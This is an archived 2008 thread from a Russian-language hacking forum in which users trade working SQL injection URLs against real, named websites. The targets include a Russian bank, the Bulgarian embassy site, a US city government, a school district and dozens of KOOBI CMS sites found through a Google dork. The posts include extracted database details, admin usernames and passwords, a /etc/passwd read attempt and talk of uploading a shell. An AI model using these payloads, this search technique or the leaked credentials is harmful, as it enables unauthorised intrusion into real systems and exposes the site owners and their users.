ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
15.02.2008, 13:40
|
|
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187
Репутация:
369
|
|
Сообщение от QZAR-X
Я нашел скуль:
http://event.zontik.ru/?cat=30'
Пробовал раскрыть его, но ничего не получается=((
Помогите пожалуйста раскрыть скуль.
Код HTML:
http://event.zontik.ru/?cat=-1'+union+select+concat_ws(0x2F,version(),database(),user())/*
5.0.41-log/zontikweb/zontik_grab@localhost
а дальше сам попробуй если не получиться помогу
стало самому интересно
Код HTML:
http://event.zontik.ru/?cat=-1'+union+select+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES/*
вот какие таблицы нашел :
PHP код:
COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE
PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS
USER_PRIVILEGES,VIEWS,del_status,dns_a,dns_cname,dns_dep,dns_isp_dns,dns_mx,dns_nodes,dns_secondary,dns_spf,doctype,groups
help_documents,help_nodes,help_tickets,isp_com,isp_dep,isp_dienste,isp_fakt_artikel,isp_fakt_dep,isp_fakt_nodes,isp_fakt_rechnung
isp_fakt_record,isp_firewall,isp_htaccess,isp_isp_actions,isp_isp_admin,isp_isp_datenbank
LOAD_FILE:
Код HTML:
http://event.zontik.ru/?cat=-1'+union+select+LOAD_FILE('/etc/passwd')/*
Код HTML:
http://event.zontik.ru/?cat=-1'+union+select+user+from+mysql.user/*
user: whole
пароль не смог узнать (((
и шелл не получаеться залить
еси кто осилит сообщите мне плизз 
Последний раз редактировалось satana8920; 16.02.2008 в 00:44..
|
|
|
15.02.2008, 15:31
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509
Репутация:
338
|
|
Код:
http://www.newkurkino.ru/modules.php?op=modload&name=News&file=article&sid=0x3127%20union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
4.0.26-log/udb223/Uwww223S@localhost |
|
|
|
15.02.2008, 15:49
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576
Репутация:
100
|
|
www.ci.petoskey.mi.us
Код:
http://www.ci.petoskey.mi.us/gallery2.php?gallery_id=-5+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5/*
5.0.27-log:cityofpetoskey@localhost:cityofpetoskey
Код:
http://www.ci.petoskey.mi.us/gallery2.php?gallery_id=-5+union+select+1,concat_ws(0x3a,id,username,password),3,4,5+from+mgr_users+limit+0,1/*
1:admin:employee104
www.warwick.k12.pa.us
Код:
http://www.warwick.k12.pa.us/news.php?id=-3+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9/*
4.0.24:root@localhost:basmati
|
|
|
|
15.02.2008, 16:24
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
KOOBI CMS
уязвимость в параметре img_id
пример поиска уязвимых сайтов в гугле
allinurl:"index.php?p=gallerypic" результатов порядка 4500 тыс. !!!
Пример уязвимого сайта:
код:
http://www.ria-alliance.com.ua/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
________________________
для новичков!
чтоб увидеть инъекцию в действии на любом другом сайте работающем на этом движке,достаточно вставить код обозначеный красным цветом в примере уязвимого сайта.
|
|
|
|
15.02.2008, 18:22
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286
Репутация:
187
|
|
PHP Live! 3.2.2
https://www.msufcu.org/knowledge_searchm.php?mnuccid=65&l=&x=&action=expa nd_question&questid=-230%20union%20select%201,2,3,4,5,6,7,concat(login,char(5),password)+from+chat_admin--&deptid=3&catid=4&keyword=
|
|
|
|
15.02.2008, 20:24
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509
Репутация:
338
|
|
Код:
http://ykm.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://sotovic.org/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.cheryclub.org.ua/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.mss-design.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.atyraunews.com/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.litinstitut.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://foto-push.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.99t.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://ww.moderni-talo.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.bia-team.com/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.photocapture.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.magellan.by/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.torzhok.info/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.aagu.org.ua/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://ns64.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.blik-irk.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://fevralka.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.trust-building.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://mtt-mn.com/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.dancetrip.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.autoshoes.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://shelvergroup.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.jaray.org/home/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.laser-m.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://www.kvart-a.com.ua/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://dizua.com/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://artdi.ru/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
http://business.clarimondgroup.com/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
Их там дофига (ГУГЛ)))) мне уже скучно стало подставлять)
Спасибо fobofob |
|
|
|
15.02.2008, 20:42
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
металлопрокат
http://www.akmmetal.md/?lang=ru&menu_id=248&gallery_id=
-1+union+select+1,2,3,concat_ws(0x2F,version(), database(),user()),5,6,7,8,9,10,11,12,13/*
5.0.27/17182/17182@localhost
Последний раз редактировалось xcedz; 15.02.2008 в 22:22..
|
|
|
|
15.02.2008, 22:31
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
http://www.bank-peresvet.ru/ - Банк "Пересвет"
Код:
http://www.bank-peresvet.ru/article2/52/**/and/**/ascii(lower(substring((select/**/table_name/**/from/**/information_schema.columns/**/where/**/column_name=0x6964/**/limit/**/1),3,1)))%3E107/*
Здесь катит только посимвольный перебор, версия mysql точно 5-ая, я начал перебирать имя первой таблицы, в которой есть колонка id, подобрал первые 2 символа ( дальше надоело ) - co , если кому интересно - копайте дальше...
http://www.artcifra.com/ - сайт разработчиков весьма неплохой CMS
Код:
http://www.artcifra.com/index.php?act=portfolio&subact=2&count=&id=-9+union+select+1,2,cast(concat(user_name,0x3a,user_password)+as+binary),4,5,6,7,8+from+4images_users+limit+2,1/*
User: timoshenkov_001@77.221.130.14
Version: 5.0.51-3-log
Administration: http://www.artcifra.com/admin
Login: goga
Password: 5971548
http://bolgaria.ru/ - посольство Болгарии в России
Код:
http://bolgaria.ru/news/index.php?id=-690'+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8+from+forums_auth/*
Version: 5.0.45
User: bulgaria@localhost
|
|
|
|
15.02.2008, 22:39
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
фэнам гонок needForSpeed 
http://www.sportcar-rm.ru/?p=1+union+select+concat_ws(0x2F,version(),%20data base(),user())/*
5.0.24-standard/db_sportcarrm1/sportcarrm1@localhost
|
|
|
|
15.02.2008, 23:27
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509
Репутация:
338
|
|
Код:
http://livre.ru/change/index.php?id=0x3127%20union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
4.1.22/links_exchange/linkuser@localhost
Код:
http://program.org.ua/index.php?cat=0x3127%20union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9,10,11,12/*
5.0.45-log/freeware/freeware@localhost
Код:
http://www.polkaudio.com/education/article.php?id=0x3127%20union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9/*
5.0.37/polk/webuser@localhost
Код:
http://www.pnevmo.ru/index.php?cat_id=1'%20union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
4.1.20-log/db_laaqer_3/dbu_laaqer_1@192.168.3.49
Последний раз редактировалось CaNNabi$; 15.02.2008 в 23:32..
Причина: http://www.pnevmo.ru/
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
